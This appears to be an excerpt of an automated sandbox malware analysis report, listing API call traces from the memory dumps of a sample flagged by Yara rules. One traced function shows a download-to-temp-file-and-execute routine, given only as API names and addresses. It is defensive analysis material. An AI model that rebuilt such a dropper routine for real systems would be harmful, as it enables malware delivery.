                                                                                                    • SetCapture.USER32(?), ref: 004027A1
                                                                                                    • GetDC.USER32(00000000), ref: 004027D5
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                                                                    • GetKeyState.USER32(0000001B), ref: 004027F8
                                                                                                    • DestroyWindow.USER32(?), ref: 0040280D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                    • String ID: gya
                                                                                                    • API String ID: 2545303185-1989253062
                                                                                                    • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                    • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                                                                    • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                    • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 2509303402-0
                                                                                                    • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                    • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                                                                    • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                    • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 2509303402-0
                                                                                                    • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                    • Instruction ID: 98289460021da286052a466a678b19c04c717ca19ae7b32c1675f79fada273c4
                                                                                                    • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                    • Instruction Fuzzy Hash: 8AB190B5900205AFDF509F74C881BEEBBB6BF08300F14456DF499A7382DB7699419B64
                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                                                                    • _free.LIBCMT ref: 0043A631
                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                    • _free.LIBCMT ref: 0043A653
                                                                                                    • _free.LIBCMT ref: 0043A668
                                                                                                    • _free.LIBCMT ref: 0043A673
                                                                                                    • _free.LIBCMT ref: 0043A695
                                                                                                    • _free.LIBCMT ref: 0043A6A8
                                                                                                    • _free.LIBCMT ref: 0043A6B6
                                                                                                    • _free.LIBCMT ref: 0043A6C1
                                                                                                    • _free.LIBCMT ref: 0043A6F9
                                                                                                    • _free.LIBCMT ref: 0043A700
                                                                                                    • _free.LIBCMT ref: 0043A71D
                                                                                                    • _free.LIBCMT ref: 0043A735
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID:
                                                                                                    • API String ID: 161543041-0
                                                                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                    • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                    • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0067A8A3
                                                                                                      • Part of subcall function 00679BF2: _free.LIBCMT ref: 00679C0F
                                                                                                      • Part of subcall function 00679BF2: _free.LIBCMT ref: 00679C21
                                                                                                      • Part of subcall function 00679BF2: _free.LIBCMT ref: 00679C33
                                                                                                      • Part of subcall function 00679BF2: _free.LIBCMT ref: 00679C45
                                                                                                      • Part of subcall function 00679BF2: _free.LIBCMT ref: 00679C57
                                                                                                      • Part of subcall function 00679BF2: _free.LIBCMT ref: 00679C69
                                                                                                      • Part of subcall function 00679BF2: _free.LIBCMT ref: 00679C7B
                                                                                                      • Part of subcall function 00679BF2: _free.LIBCMT ref: 00679C8D
                                                                                                      • Part of subcall function 00679BF2: _free.LIBCMT ref: 00679C9F
                                                                                                      • Part of subcall function 00679BF2: _free.LIBCMT ref: 00679CB1
                                                                                                      • Part of subcall function 00679BF2: _free.LIBCMT ref: 00679CC3
                                                                                                      • Part of subcall function 00679BF2: _free.LIBCMT ref: 00679CD5
                                                                                                      • Part of subcall function 00679BF2: _free.LIBCMT ref: 00679CE7
                                                                                                    • _free.LIBCMT ref: 0067A898
                                                                                                      • Part of subcall function 006736D1: HeapFree.KERNEL32(00000000,00000000,?,0067A35F,?,00000000,?,00000000,?,0067A603,?,00000007,?,?,0067A9F7,?), ref: 006736E7
                                                                                                      • Part of subcall function 006736D1: GetLastError.KERNEL32(?,?,0067A35F,?,00000000,?,00000000,?,0067A603,?,00000007,?,?,0067A9F7,?,?), ref: 006736F9
                                                                                                    • _free.LIBCMT ref: 0067A8BA
                                                                                                    • _free.LIBCMT ref: 0067A8CF
                                                                                                    • _free.LIBCMT ref: 0067A8DA
                                                                                                    • _free.LIBCMT ref: 0067A8FC
                                                                                                    • _free.LIBCMT ref: 0067A90F
                                                                                                    • _free.LIBCMT ref: 0067A91D
                                                                                                    • _free.LIBCMT ref: 0067A928
                                                                                                    • _free.LIBCMT ref: 0067A960
                                                                                                    • _free.LIBCMT ref: 0067A967
                                                                                                    • _free.LIBCMT ref: 0067A984
                                                                                                    • _free.LIBCMT ref: 0067A99C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID:
                                                                                                    • API String ID: 161543041-0
                                                                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                    • Instruction ID: f275116314413b0b9f290396261bcadb08628e1c1ca018a63990edb738dd2a93
                                                                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                    • Instruction Fuzzy Hash: A4318F71610200EFDFA0ABB8D845B9AB3EAAF40350F21C41DE44DD7751DB71AD60DB1A
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                    • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                                                                    • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                    • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                                                                    APIs
                                                                                                    • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 00642C7E
                                                                                                    • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00642C94
                                                                                                    • GetTempPathW.KERNEL32(00000105,?), ref: 00642CB0
                                                                                                    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00642CC6
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00642CFF
                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00642D3B
                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00642D58
                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00642DCF
                                                                                                    • WaitForSingleObject.KERNEL32(?,00008000), ref: 00642DE4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                    • String ID: <
                                                                                                    • API String ID: 838076374-4251816714
                                                                                                    • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                    • Instruction ID: d488077c5371dcca23c764765430f42ab32332f157715f33dba9eb2c94ca4f83
                                                                                                    • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                    • Instruction Fuzzy Hash: 14416CB190022DAEEB209F60DC85FEAB7BDFF05745F5080E9B548A2150DE709E858FA4
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0065F228,00000004,00657D87,00000004,00658069), ref: 0065EEF9
                                                                                                    • GetLastError.KERNEL32(?,0065F228,00000004,00657D87,00000004,00658069,?,00658799,?,00000008,0065800D,00000000,?,?,00000000,?), ref: 0065EF05
                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,0065F228,00000004,00657D87,00000004,00658069,?,00658799,?,00000008,0065800D,00000000,?,?,00000000), ref: 0065EF15
                                                                                                    • GetProcAddress.KERNEL32(00000000,00447430), ref: 0065EF2B
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0065EF41
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0065EF58
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0065EF6F
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0065EF86
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0065EF9D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                    • String ID: advapi32.dll
                                                                                                    • API String ID: 2340687224-4050573280
                                                                                                    • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                    • Instruction ID: 9e635e46b7a46e448f0e050300354f504cd9686b03341057577f265c3e8fd771
                                                                                                    • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                    • Instruction Fuzzy Hash: A621AEB1904701BFDB106FB49C49A9ABFA8EF06B17F004A2AF541E3601CB7C85418BA8
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0065F228,00000004,00657D87,00000004,00658069), ref: 0065EEF9
                                                                                                    • GetLastError.KERNEL32(?,0065F228,00000004,00657D87,00000004,00658069,?,00658799,?,00000008,0065800D,00000000,?,?,00000000,?), ref: 0065EF05
                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,0065F228,00000004,00657D87,00000004,00658069,?,00658799,?,00000008,0065800D,00000000,?,?,00000000), ref: 0065EF15
                                                                                                    • GetProcAddress.KERNEL32(00000000,00447430), ref: 0065EF2B
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0065EF41
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0065EF58
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0065EF6F
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0065EF86
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0065EF9D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                    • String ID: advapi32.dll
                                                                                                    • API String ID: 2340687224-4050573280
                                                                                                    • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                    • Instruction ID: 532a27be84eb78e873cec26c6b9f8b9426da295d68fc9787f4097498e36a7d9b
                                                                                                    • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                    • Instruction Fuzzy Hash: 0121BDB1904701BFDB106FB49C49A5ABFECEF06B17F008A2AF541E3601CB7C95418BA8
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0065670B), ref: 006524B6
                                                                                                    • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 006524C4
                                                                                                    • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 006524D2
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0065670B), ref: 00652500
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00652507
                                                                                                    • GetLastError.KERNEL32(?,?,?,0065670B), ref: 00652522
                                                                                                    • GetLastError.KERNEL32(?,?,?,0065670B), ref: 0065252E
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00652544
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00652552
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                    • String ID: kernel32.dll
                                                                                                    • API String ID: 4179531150-1793498882
                                                                                                    • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                    • Instruction ID: b9a63be9857d2fa05af78e079b83d2fa438987d25618d24da8e64b1e6881c2fc
                                                                                                    • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                    • Instruction Fuzzy Hash: F51186755003127FE7117B746CAA96B7BAD9E46B13B20052AB801E3252FB74D90486AD
                                                                                                    APIs
                                                                                                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                                                                      • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                    • String ID: pContext$switchState
                                                                                                    • API String ID: 3151764488-2660820399
                                                                                                    • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                    • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                                                                    • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                    • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                                                                    • SafeRWList.LIBCONCRT ref: 00419798
                                                                                                      • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                                                                      • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                                                                    • GetLastError.KERNEL32 ref: 004197B9
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                    • String ID: eventObject
                                                                                                    • API String ID: 1999291547-1680012138
                                                                                                    • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                    • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                                                                    • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                    • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00660C36
                                                                                                    • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00660C9D
                                                                                                    • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00660CBA
                                                                                                    • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00660D20
                                                                                                    • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00660D35
                                                                                                    • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00660D47
                                                                                                    • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 00660D75
                                                                                                    • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00660D80
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00660DAC
                                                                                                    • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 00660DBC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3720063390-0
                                                                                                    • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                    • Instruction ID: 20f92f1bda18ecd66b5d9a019631650549b1936053e4db4a9a47a9d81112730e
                                                                                                    • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                    • Instruction Fuzzy Hash: C141A030A042489AEF54FBA4C4567EE7BA3AF42304F1441BDE9065B383CF359E09C769
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00431DFA
                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                    • _free.LIBCMT ref: 00431E06
                                                                                                    • _free.LIBCMT ref: 00431E11
                                                                                                    • _free.LIBCMT ref: 00431E1C
                                                                                                    • _free.LIBCMT ref: 00431E27
                                                                                                    • _free.LIBCMT ref: 00431E32
                                                                                                    • _free.LIBCMT ref: 00431E3D
                                                                                                    • _free.LIBCMT ref: 00431E48
                                                                                                    • _free.LIBCMT ref: 00431E53
                                                                                                    • _free.LIBCMT ref: 00431E61
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                    • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
                                                                                                    • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                    • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00672061
                                                                                                      • Part of subcall function 006736D1: HeapFree.KERNEL32(00000000,00000000,?,0067A35F,?,00000000,?,00000000,?,0067A603,?,00000007,?,?,0067A9F7,?), ref: 006736E7
                                                                                                      • Part of subcall function 006736D1: GetLastError.KERNEL32(?,?,0067A35F,?,00000000,?,00000000,?,0067A603,?,00000007,?,?,0067A9F7,?,?), ref: 006736F9
                                                                                                    • _free.LIBCMT ref: 0067206D
                                                                                                    • _free.LIBCMT ref: 00672078
                                                                                                    • _free.LIBCMT ref: 00672083
                                                                                                    • _free.LIBCMT ref: 0067208E
                                                                                                    • _free.LIBCMT ref: 00672099
                                                                                                    • _free.LIBCMT ref: 006720A4
                                                                                                    • _free.LIBCMT ref: 006720AF
                                                                                                    • _free.LIBCMT ref: 006720BA
                                                                                                    • _free.LIBCMT ref: 006720C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                    • Instruction ID: 5e1a77752403765e72e2c53ccdcc7c704fb09a6c4808fb6d8ad5cb826628f568
                                                                                                    • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                    • Instruction Fuzzy Hash: 0D1146B5610118BFCF81EF64C942DD93BA6EF04350B6181A9F90C4F362D671DF60AB54
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __cftoe
                                                                                                    • String ID: F(@$F(@
                                                                                                    • API String ID: 4189289331-2038261262
                                                                                                    • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                    • Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
                                                                                                    • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                    • Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
                                                                                                    APIs
                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DecodePointer
